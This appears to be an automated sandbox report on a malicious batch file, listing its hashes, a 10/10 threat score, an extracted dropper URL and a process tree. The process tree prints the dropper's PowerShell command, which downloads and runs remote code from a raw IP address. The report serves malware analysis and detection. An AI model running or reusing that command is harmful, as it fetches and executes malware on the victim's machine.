Analysis
-
max time kernel
105s -
max time network
110s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
01-04-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
RMZ0Lp3a.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
RMZ0Lp3a.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
RMZ0Lp3a.bat
-
Size
189B
-
MD5
90218b146362ab63d589252e71438a02
-
SHA1
dc39398af964a74d66f9c56b7fca4e744aa358e5
-
SHA256
c143487b82fdc527a3a7f896b0afc37ee38a0f571f200f7d09fc1c01f39acaf6
-
SHA512
67f13a2db6187c3a7b9647006fd3dd3730b38b09afd47f534905d0ece9aef341f0c1d9374e6a6ef435eac21450c0837dc24fd8a30b68a3b90018ad30e060c4bc
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/RMZ0Lp3a
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3904 3516 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3904 WerFault.exe Token: SeBackupPrivilege 3904 WerFault.exe Token: SeDebugPrivilege 3904 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe 3904 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RMZ0Lp3a.bat"1⤵PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/RMZ0Lp3a');Invoke-CDLIHL;Start-Sleep -s 10000"2⤵PID:3516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3904